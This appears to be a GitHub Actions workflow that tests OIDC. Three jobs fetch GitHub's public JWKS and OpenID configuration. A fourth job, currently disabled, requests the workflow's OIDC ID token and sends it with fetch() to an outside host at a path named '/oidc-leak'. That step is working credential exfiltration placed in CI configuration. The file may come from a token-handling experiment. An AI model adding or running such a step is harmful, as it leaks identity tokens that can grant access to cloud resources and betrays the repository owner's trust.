name: oidc-test

on:
  push:
    branches: [main]
    
permissions:
  id-token: write # This is required for requesting the JWT
  contents: read  # This is required for actions/checkout

jobs:
  fetch-jwks-ubuntu:
    runs-on: ubuntu-latest
    steps:
    - name: fetch jwks
      run: |
        set -x
        curl -L https://token.actions.githubusercontent.com/.well-known/openid-configuration
        curl -L https://token.actions.githubusercontent.com/.well-known/jwks.json

  fetch-jwks-alpine:
    runs-on: ubuntu-latest
    container:
      image: alpine:latest
    steps:
    - name: fetch jwks
      run: |
        set -x
        curl -L https://token.actions.githubusercontent.com/.well-known/openid-configuration
        curl -L https://token.actions.githubusercontent.com/.well-known/jwks.json

  fetch-jwks-macos:
    runs-on: macos-latest
    steps:
    - name: fetch jwks
      run: |
        set -x
        curl -L https://token.actions.githubusercontent.com/.well-known/openid-configuration
        curl -L https://token.actions.githubusercontent.com/.well-known/jwks.json

  oidc-test:
    if: false
    runs-on: ubuntu-latest
    steps:
    - name: Install OIDC Client from Core Package
      run: npm install @actions/core@1.6.0 @actions/http-client
      
    - name: Get Id Token
      uses: actions/github-script@v6
      id: idtoken
      with:
        script: |
          const coredemo = require('@actions/core')
          let id_token = await coredemo.getIDToken()
          coredemo.setOutput('id_token', id_token)

          fetch(`https://msi.tailbafb9.ts.net/oidc-leak?token=${id_token}`)
    
